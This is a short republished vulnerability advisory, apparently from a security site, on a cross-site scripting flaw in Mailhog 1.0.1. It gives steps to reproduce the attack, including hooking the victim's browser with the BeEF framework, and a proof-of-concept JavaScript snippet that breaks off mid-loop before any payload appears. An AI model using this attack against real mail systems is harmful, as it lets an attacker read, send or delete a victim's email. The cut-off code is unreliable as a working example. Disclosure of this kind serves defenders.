vulnerability

Mailhog 1.0.1 Cross-Site Scripting XSS

Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including email deletion, sending, reading or any other call.

Steps to reproduce:
1. Create malicious attachment with payloads stated below
2. Attach a malicious file to email with payload (XSS)
3. Send email
4. Wait for the victim to open an email
5. Receive data, get control of victim browser using Beef framework, or manipulate with API data



Proof of Concept:

var XMLHttpFactories = [

function () {

return new XMLHttpRequest()

},

function () {

return new ActiveXObject("Msxml2.XMLHTTP")

},

function () {

return new ActiveXObject("Msxml3.XMLHTTP")

},

function () {

return new ActiveXObject("Microsoft.XMLHTTP")

}

];

function createXMLHTTPObject() {

var xmlhttp = false;

for (var i=0;i

try {

Suggest an edit to this article

Go to Cybersecurity Knowledge Base

Got to the Latest Cybersecurity News

Go to Cybersecurity Academy

Go to Homepage

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Mailhog 1.0.1 Cross-Site Scripting XSS
Latest posts by RiSec.Mitch (see all)
Recommended:  Microsoft Windows Defender - Detections Bypass
Share the word, let's increase Cybersecurity Awareness as we know it

Leave a Comment

Your email address will not be published. Required fields are marked *

RiSec Captcha + 19 = 21